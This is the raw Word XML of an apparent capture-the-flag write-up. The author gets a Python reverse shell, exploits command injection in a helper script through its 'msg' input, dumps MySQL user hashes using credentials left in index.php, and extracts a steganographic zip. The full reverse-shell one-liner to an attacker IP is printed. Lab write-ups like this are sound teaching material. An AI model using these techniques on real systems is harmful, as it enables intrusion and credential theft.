    <w:p w14:paraId="44E13F11" w14:textId="752E8BF6" w:rsidR="00852FC2" w:rsidRDefault="00CD6A85" w:rsidP="00F43890">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00852FC2" w:rsidRPr="00852FC2">
        <w:t>sed -n 'p' /home/apaar/.helpline.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” (I tried to open </w:t>
      </w:r>
      <w:r w:rsidR="00A13CED">
        <w:t>local.txt with it but it didn’t work</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286AEB95" w14:textId="4B0BD888" w:rsidR="00133E15" w:rsidRDefault="007F25E0" w:rsidP="00F43890">
      <w:r w:rsidRPr="007F25E0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="207EBAD1" wp14:editId="38D19C7F">
            <wp:extent cx="7239627" cy="1265030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="154223760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376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39627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CCD81" w14:textId="0C9AA282" w:rsidR="00831615" w:rsidRDefault="00390EBD" w:rsidP="00F43890">
      <w:r>
        <w:t xml:space="preserve">At this point, I understood that I must </w:t>
      </w:r>
      <w:r w:rsidR="0019140F">
        <w:t xml:space="preserve">move to </w:t>
      </w:r>
      <w:r w:rsidR="0096019A">
        <w:t xml:space="preserve">a proper reverse shell so I tried several python </w:t>
      </w:r>
      <w:r w:rsidR="00E3103A">
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="00344E6C">
        <w:t>s and this one worked out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286521F0" w14:textId="286B24D8" w:rsidR="00344E6C" w:rsidRDefault="00392CC1" w:rsidP="00F43890">
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00392CC1">
        <w:t>export RHOST="192.168.146.209";export RPORT=4444;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6937EA78" w14:textId="299F4FDD" w:rsidR="00696490" w:rsidRDefault="008E0565" w:rsidP="009F78BA">
      <w:r>
        <w:t>And I finally got a nc rev shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079877D9" w14:textId="3DDA5E02" w:rsidR="009F78BA" w:rsidRDefault="00EF6C58" w:rsidP="009F78BA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D554EF6" wp14:editId="6F6AF821">
            <wp:extent cx="7556500" cy="1416685"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="261301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0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CB27" w14:textId="0854F0CD" w:rsidR="00C53619" w:rsidRDefault="00207C56" w:rsidP="009F78BA">
      <w:r>
        <w:t xml:space="preserve">Later, I discovered that </w:t>
      </w:r>
      <w:r w:rsidR="00D46B43">
        <w:t>local.txt was</w:t>
      </w:r>
      <w:r w:rsidR="00270392">
        <w:t xml:space="preserve">n’t readable </w:t>
      </w:r>
      <w:r w:rsidR="000775AB">
        <w:t xml:space="preserve">due </w:t>
      </w:r>
      <w:r w:rsidR="00BB5756">
        <w:t>to the fact that I wasn’t permitted to access it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D68B78D" w14:textId="3F9334A9" w:rsidR="00BB5756" w:rsidRDefault="00BB5756" w:rsidP="009F78BA">
      <w:r w:rsidRPr="00BB5756">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D581775" wp14:editId="078891BD">
            <wp:extent cx="3505504" cy="1867062"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39257770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777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6E593" w14:textId="546190BC" w:rsidR="00D133BF" w:rsidRDefault="00EC0B70" w:rsidP="009F78BA">
      <w:r>
        <w:t>I reopen the .helpline.sh file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B45462A" w14:textId="692EA38F" w:rsidR="00EC0B70" w:rsidRDefault="00EC0B70" w:rsidP="009F78BA">
      <w:r w:rsidRPr="00EC0B70">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D45939E" wp14:editId="3530B165">
            <wp:extent cx="4305673" cy="1867062"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="128712465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465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9DEA" w14:textId="2B739CFA" w:rsidR="00EC0B70" w:rsidRDefault="001261FC" w:rsidP="009F78BA">
      <w:r>
        <w:t xml:space="preserve">And found that </w:t>
      </w:r>
      <w:r w:rsidR="00174DDD">
        <w:t xml:space="preserve">the specific line “$msg 2&gt;/dev/null” allows </w:t>
      </w:r>
      <w:r w:rsidR="00E80837">
        <w:t>me to execute</w:t>
      </w:r>
      <w:r w:rsidR="00B754CC">
        <w:t xml:space="preserve"> bash</w:t>
      </w:r>
      <w:r w:rsidR="00E80837">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00854455">
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="00016FA5">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A77689">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D95860">
        <w:t xml:space="preserve">as the input </w:t>
      </w:r>
      <w:r w:rsidR="00AC4D5E">
        <w:t xml:space="preserve">that I </w:t>
      </w:r>
      <w:r w:rsidR="009B7C0D">
        <w:t>give</w:t>
      </w:r>
      <w:r w:rsidR="00AC4D5E">
        <w:t xml:space="preserve"> the program to the </w:t>
      </w:r>
      <w:r w:rsidR="004749F4">
        <w:t>parameter “msg</w:t>
      </w:r>
      <w:r w:rsidR="005C4945">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="006F693B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B598612" w14:textId="60ECF486" w:rsidR="001B41D3" w:rsidRDefault="00291A08" w:rsidP="009F78BA">
      <w:r>
        <w:t xml:space="preserve">Executed this file again and </w:t>
      </w:r>
      <w:r w:rsidR="00AD6896">
        <w:t xml:space="preserve">tried to check if </w:t>
      </w:r>
      <w:r w:rsidR="00537B1B">
        <w:t xml:space="preserve">I was correct and this can </w:t>
      </w:r>
      <w:r w:rsidR="00250999">
        <w:t>be exploitable</w:t>
      </w:r>
      <w:r w:rsidR="00360128">
        <w:t xml:space="preserve"> (because I runs it </w:t>
      </w:r>
      <w:r w:rsidR="00906F4B">
        <w:t>as apaar</w:t>
      </w:r>
      <w:r w:rsidR="00360128">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00250999">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EF822A" w14:textId="7E9347C2" w:rsidR="00250999" w:rsidRDefault="005843C0" w:rsidP="009F78BA">
      <w:r w:rsidRPr="005843C0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7334CF5D" wp14:editId="4C042695">
            <wp:extent cx="4237087" cy="838273"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1651421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421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0BF0" w14:textId="7444FA8F" w:rsidR="00275B60" w:rsidRDefault="00FE4149" w:rsidP="009F78BA">
      <w:r>
        <w:t>I entered the string “test” for the first input</w:t>
      </w:r>
      <w:r w:rsidR="00B832A5">
        <w:t>, and then I entered “</w:t>
      </w:r>
      <w:r w:rsidR="00C25937">
        <w:t>/bin/bash/” to run a shell as apaar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93CA16" w14:textId="1CC0CB18" w:rsidR="00FE4149" w:rsidRDefault="00BD6EE7" w:rsidP="009F78BA">
      <w:r w:rsidRPr="00BD6EE7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B3C07C0" wp14:editId="59F0B42B">
            <wp:extent cx="3837003" cy="838273"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="559449382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449382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003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115D" w14:textId="52F86B51" w:rsidR="003B4209" w:rsidRDefault="004113E7" w:rsidP="009F78BA">
      <w:r>
        <w:t xml:space="preserve">I successfully got </w:t>
      </w:r>
      <w:r w:rsidR="00D00329">
        <w:t>a shell as apaar</w:t>
      </w:r>
      <w:r w:rsidR="004F5038">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B731AFB" w14:textId="3999CC93" w:rsidR="004F5038" w:rsidRDefault="004F5038" w:rsidP="009F78BA">
      <w:r>
        <w:t>First of all, I opened the flag’s file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC6F6B7" w14:textId="1B71E1C7" w:rsidR="004F5038" w:rsidRDefault="004F5038" w:rsidP="009F78BA">
      <w:r w:rsidRPr="004F5038">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AEF4131" wp14:editId="47A4F3F4">
            <wp:extent cx="2838696" cy="304826"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37715317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531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38696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A9B7" w14:textId="0E9A9A45" w:rsidR="00CC6DD4" w:rsidRDefault="00EE3928" w:rsidP="009F78BA">
      <w:r>
        <w:t xml:space="preserve">Second, I </w:t>
      </w:r>
      <w:r w:rsidR="00737FBF">
        <w:t xml:space="preserve">established new nc listener with the port 5555 and entered this command in the first reverse shell to get a better shell of apaar: </w:t>
      </w:r>
      <w:r w:rsidR="00737FBF" w:rsidRPr="00737FBF">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C1D03BC" wp14:editId="602525C0">
            <wp:extent cx="7171041" cy="304826"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4329326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326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71041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72E5" w14:textId="1FDC8191" w:rsidR="008305DD" w:rsidRDefault="001726EA" w:rsidP="009F78BA">
      <w:r w:rsidRPr="001726EA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69634861" wp14:editId="5CF24D65">
            <wp:extent cx="4065622" cy="838273"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="316656199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656199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65622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A7473" w14:textId="1D11C912" w:rsidR="00073064" w:rsidRDefault="002D6C18" w:rsidP="009F78BA">
      <w:r>
        <w:t xml:space="preserve">Third, I </w:t>
      </w:r>
      <w:r w:rsidR="00101524">
        <w:t xml:space="preserve">needed to find </w:t>
      </w:r>
      <w:r w:rsidR="00920BB4">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00C276A5">
        <w:t xml:space="preserve"> way to escalate my privileges to </w:t>
      </w:r>
      <w:r w:rsidR="00466F01">
        <w:t xml:space="preserve">find root’s </w:t>
      </w:r>
      <w:r w:rsidR="00935F79">
        <w:t>flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E71F514" w14:textId="734E14FC" w:rsidR="00A82E5B" w:rsidRDefault="00A17845" w:rsidP="00086D61">
      <w:r>
        <w:t>I started by checking my current privileges, which didn’t help me very much</w:t>
      </w:r>
      <w:r w:rsidR="00A82E5B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149AD72F" w14:textId="0559BCCF" w:rsidR="00B04AF9" w:rsidRDefault="000702A8" w:rsidP="009F78BA">
      <w:r w:rsidRPr="000702A8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EAD086C" wp14:editId="2F29030C">
            <wp:extent cx="5734547" cy="971634"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56972194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219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4547" cy="9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0E7B" w14:textId="6329FB85" w:rsidR="00073500" w:rsidRDefault="001B34EF" w:rsidP="006A1C0F">
      <w:r>
        <w:t xml:space="preserve">Subsequently, </w:t>
      </w:r>
      <w:r w:rsidR="00A30257">
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00817B46">
        <w:t xml:space="preserve">browse a little in the file system for </w:t>
      </w:r>
      <w:r w:rsidR="00FC164F">
        <w:t xml:space="preserve">several good minutes until I found </w:t>
      </w:r>
      <w:r w:rsidR="00B5506D">
        <w:t>this folder:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F29185" w14:textId="30389152" w:rsidR="00B5506D" w:rsidRDefault="00B5506D" w:rsidP="006A1C0F">
      <w:r w:rsidRPr="00B5506D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="052BBF66" wp14:editId="7A5A5FE7">
            <wp:extent cx="3200677" cy="1238357"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="982073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732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23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EFB6F" w14:textId="7C9DB080" w:rsidR="009C4B7F" w:rsidRDefault="009C4B7F" w:rsidP="006A1C0F">
      <w:r>
        <w:t xml:space="preserve">Here, there were </w:t>
      </w:r>
      <w:r w:rsidR="00395E7C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005A3EBE">
        <w:t>important file</w:t>
      </w:r>
      <w:r w:rsidR="00131C4B">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="006C0271">
        <w:t xml:space="preserve">that run </w:t>
      </w:r>
      <w:r w:rsidR="007451C9">
        <w:t>the /secret page and I opened each one of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC8489" w14:textId="23EE3814" w:rsidR="007451C9" w:rsidRDefault="007451C9" w:rsidP="006A1C0F">
      <w:r>
        <w:t xml:space="preserve">I found </w:t>
      </w:r>
      <w:r w:rsidR="00DA49E1">
        <w:t xml:space="preserve">useful information </w:t>
      </w:r>
      <w:r w:rsidR="006F6391">
        <w:t>in index.php file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24936B34" w14:textId="72191158" w:rsidR="006F6391" w:rsidRDefault="004C7B50" w:rsidP="006A1C0F">
      <w:r w:rsidRPr="004C7B50">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46BB44E5" wp14:editId="194EDCA3">
            <wp:extent cx="7144369" cy="5734547"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="177276595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659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144369" cy="57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7E71" w14:textId="34FBC616" w:rsidR="00E1511F" w:rsidRDefault="00E1511F" w:rsidP="006A1C0F">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="0063783A">
        <w:t xml:space="preserve">writer basically </w:t>
      </w:r>
      <w:r w:rsidR="00E05F56">
        <w:t xml:space="preserve">left there </w:t>
      </w:r>
      <w:r w:rsidR="00B235DF">
        <w:t xml:space="preserve">the target’s </w:t>
      </w:r>
      <w:r w:rsidR="005450BA">
        <w:t xml:space="preserve">mysql database credentials </w:t>
      </w:r>
      <w:r w:rsidR="009C3CDC">
        <w:t xml:space="preserve">which I used in this command </w:t>
      </w:r>
      <w:r w:rsidR="0097303E">
        <w:t>to access it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12728B02" w14:textId="348B1F45" w:rsidR="0097303E" w:rsidRDefault="00E708F4" w:rsidP="006A1C0F">
      <w:r w:rsidRPr="00E708F4">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="583B6A17" wp14:editId="7A61CDE4">
            <wp:extent cx="4934378" cy="2370025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13343552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3552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34378" cy="23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E478" w14:textId="6767B0E4" w:rsidR="009F70B0" w:rsidRDefault="00827010" w:rsidP="00863A06">
      <w:r>
        <w:t xml:space="preserve">Here I enumerate the </w:t>
      </w:r>
      <w:r w:rsidR="00950A56">
        <w:t>databases</w:t>
      </w:r>
      <w:r w:rsidR="00AC685B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0667F08D" w14:textId="36914037" w:rsidR="00AC685B" w:rsidRDefault="00E60702" w:rsidP="00863A06">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D594AB4" wp14:editId="1D586EF2">
            <wp:extent cx="2516263" cy="2374900"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="15078115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115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21035" cy="237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F71E" w14:textId="60378F21" w:rsidR="00EC24BC" w:rsidRDefault="00227117" w:rsidP="00F84DF8">
      <w:r>
        <w:t xml:space="preserve">Then, I </w:t>
      </w:r>
      <w:r w:rsidR="001A5A58">
        <w:t xml:space="preserve">chose to enter the </w:t>
      </w:r>
      <w:r w:rsidR="003B7864">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="006F6239">
        <w:t>webportal</w:t>
      </w:r>
      <w:r w:rsidR="003B7864">
        <w:t xml:space="preserve">” database and see his </w:t>
      </w:r>
      <w:r w:rsidR="00EC24BC">
        <w:t>tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD0AEC" w14:textId="3D4873D0" w:rsidR="006C0933" w:rsidRDefault="00D23AAA" w:rsidP="00863A06">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F8FD060" wp14:editId="1FB5CB43">
            <wp:extent cx="5562600" cy="1127946"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1262558539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58539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7060" cy="113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957D4" w14:textId="2E130F07" w:rsidR="00EA5C73" w:rsidRDefault="006F76BB" w:rsidP="00863A06">
      <w:r w:rsidRPr="006F76BB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C344381" wp14:editId="7D968327">
            <wp:extent cx="1733700" cy="1036410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="827948331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48331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33700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17916" w14:textId="62E56D52" w:rsidR="006712B7" w:rsidRDefault="006712B7" w:rsidP="00863A06">
      <w:r>
        <w:t>There was here only one table of the website’s users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E132BCC" w14:textId="13D43B68" w:rsidR="00C81F2E" w:rsidRDefault="00172A8E" w:rsidP="00863A06">
      <w:r>
        <w:t xml:space="preserve">I opened it and found </w:t>
      </w:r>
      <w:r w:rsidR="007B53B3">
        <w:t xml:space="preserve">the credentials of the </w:t>
      </w:r>
      <w:r w:rsidR="007F7DB1">
        <w:t>user “</w:t>
      </w:r>
      <w:r w:rsidR="007766EF">
        <w:t>Anur</w:t>
      </w:r>
      <w:r w:rsidR="008F039C">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="007766EF">
        <w:t xml:space="preserve">dh” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D69406" w14:textId="3E3A44B7" w:rsidR="00711F4B" w:rsidRDefault="00711F4B" w:rsidP="00863A06">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C6AEBC8" wp14:editId="1ABB4670">
            <wp:extent cx="6523566" cy="1605674"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85729344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934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531551" cy="160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BE9B" w14:textId="7457E87C" w:rsidR="007F7221" w:rsidRDefault="007F7221" w:rsidP="00863A06">
      <w:r>
        <w:t xml:space="preserve">I tried to use these </w:t>
      </w:r>
      <w:r w:rsidR="0047763A">
        <w:t>passwords,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but they didn’t </w:t>
      </w:r>
      <w:r w:rsidR="00A46FA3">
        <w:t>work</w:t>
      </w:r>
      <w:r w:rsidR="00856D43">
        <w:t xml:space="preserve">. I looked a bit more </w:t>
      </w:r>
      <w:r w:rsidR="00CE12FD">
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidR="00856D43">
        <w:t xml:space="preserve"> them and </w:t>
      </w:r>
      <w:r w:rsidR="005859A9">
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="008D376F">
        <w:t xml:space="preserve">concluded that they are </w:t>
      </w:r>
      <w:r w:rsidR="007B68D5">
        <w:t>probably</w:t>
      </w:r>
      <w:r w:rsidR="00D71DD8">
        <w:t xml:space="preserve"> hashed by md5</w:t>
      </w:r>
      <w:r w:rsidR="003B2614">
        <w:t xml:space="preserve"> (because of their length)</w:t>
      </w:r>
      <w:r w:rsidR="00F24A40">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA2DD9C" w14:textId="0D4F7488" w:rsidR="00C123FA" w:rsidRDefault="004B641B" w:rsidP="002065C3">
      <w:r>
        <w:t>I tried to</w:t>
      </w:r>
      <w:r w:rsidR="00EF4D48">
        <w:t xml:space="preserve"> find their </w:t>
      </w:r>
      <w:r w:rsidR="00A111CC">
        <w:t xml:space="preserve">original </w:t>
      </w:r>
      <w:r w:rsidR="00837391">
        <w:t xml:space="preserve">value in a database of </w:t>
      </w:r>
      <w:r w:rsidR="006063D1">
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidR="00837391" w:rsidRPr="002550DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>crack</w:t>
        </w:r>
        <w:r w:rsidR="00837391" w:rsidRPr="002550DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>stati</w:t>
        </w:r>
        <w:r w:rsidR="00837391" w:rsidRPr="002550DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>on</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006063D1">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00837391">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60060131" w14:textId="086F4AAB" w:rsidR="009D5B8C" w:rsidRDefault="002A5600" w:rsidP="002065C3">
      <w:r w:rsidRPr="002A5600">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3090494E" wp14:editId="6246AC0B">
            <wp:extent cx="7556500" cy="645795"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
            <wp:docPr id="20660719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719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6233" w14:textId="6F7D0568" w:rsidR="004E0147" w:rsidRDefault="00C45CB2" w:rsidP="002065C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A456569" wp14:editId="67960534">
            <wp:extent cx="7556500" cy="598170"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1368116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16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C9A64" w14:textId="3B9F36F5" w:rsidR="00434D89" w:rsidRDefault="000717E8" w:rsidP="00434D89">
      <w:r>
        <w:t>Unfortunately</w:t>
      </w:r>
      <w:r w:rsidR="00434D89">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C06DE">
        <w:t xml:space="preserve">they didn’t help </w:t>
      </w:r>
      <w:r w:rsidR="001D4AFC">
        <w:t xml:space="preserve">me much in the </w:t>
      </w:r>
      <w:r w:rsidR="00F54455">
        <w:t>shell itself</w:t>
      </w:r>
      <w:r w:rsidR="00434D89">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1D960D" w14:textId="3BC1551E" w:rsidR="002667AD" w:rsidRDefault="00C850E6" w:rsidP="004F1543">
      <w:r>
        <w:t xml:space="preserve">Afterwards, I </w:t>
      </w:r>
      <w:r w:rsidR="00235A3C">
        <w:t xml:space="preserve">opened </w:t>
      </w:r>
      <w:r w:rsidR="00794551">
        <w:t>hacker.php and found this message:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EB1DAD" w14:textId="4A5CDB94" w:rsidR="00794551" w:rsidRDefault="00794551" w:rsidP="004F1543">
      <w:r w:rsidRPr="00794551">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67609328" wp14:editId="7EFA4FED">
            <wp:extent cx="3170195" cy="331499"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19482646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26460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47FB1" w14:textId="4A219819" w:rsidR="00F57770" w:rsidRDefault="00137489" w:rsidP="000F5126">
      <w:r>
        <w:t xml:space="preserve">Then, I </w:t>
      </w:r>
      <w:r w:rsidR="005412CB">
        <w:t xml:space="preserve">opened </w:t>
      </w:r>
      <w:r w:rsidR="00514EE4">
        <w:t>account.php</w:t>
      </w:r>
      <w:r w:rsidR="000F5126">
        <w:t xml:space="preserve"> and didn’t found anything useful there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE9ACC" w14:textId="255C2828" w:rsidR="00D23F9A" w:rsidRDefault="00621342" w:rsidP="000F5126">
      <w:r>
        <w:t xml:space="preserve">Thereafter, </w:t>
      </w:r>
      <w:r w:rsidR="007A33A3">
        <w:t xml:space="preserve">I transferred the images </w:t>
      </w:r>
      <w:r w:rsidR="00071AD9">
        <w:t>directory to my machine in order to examine them</w:t>
      </w:r>
      <w:r w:rsidR="00ED4B0B">
        <w:t xml:space="preserve"> (I have done it by establishing a python basic http server</w:t>
      </w:r>
      <w:r w:rsidR="00C81D56">
        <w:t xml:space="preserve"> on the target side</w:t>
      </w:r>
      <w:r w:rsidR="00ED4B0B">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00071AD9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C8E18" w14:textId="3E29008D" w:rsidR="00071AD9" w:rsidRDefault="002D09E5" w:rsidP="000F5126">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4606FE22" wp14:editId="5D7F6790">
            <wp:extent cx="7556500" cy="2275205"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="16739993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9993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7FF18" w14:textId="64088434" w:rsidR="00C81D56" w:rsidRDefault="00A0225E" w:rsidP="000F5126">
      <w:r>
        <w:t xml:space="preserve">And on </w:t>
      </w:r>
      <w:r w:rsidR="00C633ED">
        <w:t xml:space="preserve">my side I </w:t>
      </w:r>
      <w:r w:rsidR="00792C25">
        <w:t>requested this directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2CA6E0" w14:textId="520F9ED8" w:rsidR="000F5126" w:rsidRDefault="00637C76" w:rsidP="00EC19B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F0C018B" wp14:editId="1AF537AB">
            <wp:extent cx="4745566" cy="655340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="132210624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0624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60300" cy="6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04855" w14:textId="0F1EA21B" w:rsidR="004732E7" w:rsidRDefault="0028417F" w:rsidP="00EC19B9">
      <w:r>
        <w:t xml:space="preserve">Then, I </w:t>
      </w:r>
      <w:r w:rsidR="00774434">
        <w:t xml:space="preserve">tried to check for hidden data in the jpg image </w:t>
      </w:r>
      <w:r w:rsidR="00EA5629">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="00DE3854">
        <w:t>steganography</w:t>
      </w:r>
      <w:r w:rsidR="00BC3B8A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13243866" w14:textId="66675960" w:rsidR="00CF096A" w:rsidRDefault="0028417F" w:rsidP="00EC19B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25DCAE30" wp14:editId="0A0AB317">
            <wp:extent cx="7556500" cy="1184910"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="10158753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7539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7B71" w14:textId="65DB2BB5" w:rsidR="00D0797D" w:rsidRDefault="005655FE" w:rsidP="00EC19B9">
      <w:r>
        <w:t xml:space="preserve">I was managed </w:t>
      </w:r>
      <w:r w:rsidR="001E2815">
        <w:t xml:space="preserve">to extract </w:t>
      </w:r>
      <w:r w:rsidR="00886A09">
        <w:t>a .zip f</w:t>
      </w:r>
      <w:r w:rsidR="009543F7">
        <w:t>older with an empty passphrase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C745DAC" w14:textId="342442A8" w:rsidR="008C76E6" w:rsidRDefault="00581E79" w:rsidP="00EC19B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E1DF2B5" wp14:editId="0DF4F521">
            <wp:extent cx="6829425" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
